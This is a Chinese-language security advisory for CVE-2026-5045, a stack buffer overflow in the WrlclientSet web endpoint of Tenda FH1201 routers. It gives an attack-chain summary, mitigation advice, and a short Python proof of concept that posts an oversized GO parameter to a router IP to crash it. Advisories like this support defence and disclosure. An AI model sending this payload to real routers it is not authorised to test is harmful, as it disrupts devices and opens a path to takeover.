IPBUF安全漏洞报告
English
CVE-2026-5045 CVSS 8.8 高危

CVE-2026-5045 Tenda FH1201栈缓冲区溢出漏洞

披露日期: 2026-03-29
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5045
漏洞类型
栈缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Tenda FH1201

相关标签

缓冲区溢出远程代码执行Tenda路由器IoT安全

漏洞概述

Tenda FH1201路由器固件1.2.0.14(408)版本存在严重的栈缓冲区溢出漏洞。由于/goform/WrlclientSet接口未正确过滤输入参数,攻击者可发送恶意构造的请求包操作GO参数,远程触发栈溢出,进而可能导致设备拒绝服务或执行任意代码。

技术细节

该漏洞位于Tenda FH1201路由器固件的参数处理组件中,具体影响文件/goform/WrlclientSet的WrlclientSet功能函数。在处理HTTP请求时,程序未能对传入的GO参数进行有效的边界检查。当攻击者向该参数发送特制的超长数据时,将触发栈缓冲区溢出。由于攻击复杂度低且无需用户交互,攻击者可利用此缺陷覆盖栈上的返回地址,控制程序流程。结合特定的攻击载荷,攻击者可绕过现有保护机制,在目标系统上执行任意恶意代码。

攻击链分析

STEP 1
信息收集
攻击者扫描网络,识别目标Tenda FH1201路由器及其固件版本。
STEP 2
漏洞利用
攻击者向/goform/WrlclientSet接口发送包含超长GO参数的恶意POST请求。
STEP 3
溢出触发
由于未进行边界检查,超长数据覆盖栈上的返回地址,触发缓冲区溢出。
STEP 4
代码执行
程序流程被劫持,攻击者注入的Shellcode被执行,获取设备控制权。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_target(target_ip): url = f"http://{target_ip}/goform/WrlclientSet" # Malicious payload to trigger stack overflow # Overwriting the return address to gain control payload = "A" * 1000 data = { "GO": payload } try: response = requests.post(url, data=data, timeout=5) print(f"[*] Payload sent to {target_ip}") print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") if __name__ == "__main__": target = "192.168.0.1" # Replace with actual target IP exploit_target(target)

影响范围

Tenda FH1201 1.2.0.14(408)

防御指南

临时缓解措施
建议用户立即访问Tenda官网下载并安装最新固件补丁。在升级前,应禁用路由器的远程管理功能,并仅允许受信任的内网IP访问Web管理界面,以减少攻击面。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表